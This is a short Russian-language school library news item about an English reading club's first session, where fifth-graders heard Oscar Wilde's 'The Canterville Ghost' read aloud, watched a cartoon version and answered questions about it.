В начале учебного года в библиотеке средней школы продолжил свою работу английский клуб любителей словесности «BOOK HOUR». Основная задача клуба – обучение разным формам взаимодействия с английским текстом, что позволит детям много и увлеченно читать. Перед началом работы клуба преподаватели подобрали книги, которые отвечают уровню владения английским языком и возрастным особенностям читателей, а также способны вызвать интерес у детей. Первое занятие для студентов 5 класса MYP было посвящено сказкам знаменитого английского писателя Оскара Уайльда (Oscar Wilde), которые принадлежат к лучшим образцам этого жанра в мировой литературе. Заведующая библиотекой Ольга Владимировна Симбиркина познакомила пятиклассников с жизнью и творчеством прославленного писателя, а студентка 11 класса DP Мариам Моавад прочитала на английском языке волшебную сказку О. Уайльда «Кентервильское привидение» (The Canterville Ghost), объяснила непонятные слова и выражения. Это добрая история о призраке, который подружился с маленькой девочкой Вирджинией. Фантастическая повесть О. Уайльда наполнена юмором и забавными приключениями. Дети вместе с главными героями учатся сопереживать и заботиться о близких, узнают, что такое настоящая дружба, ради которой можно преодолеть любые преграды. Это трогательная история о любви, доброте и самопожертвовании.
В конце встречи юные читатели посмотрели мультфильм «The Canterville Ghost [English]» и ответили на вопросы Мариам.
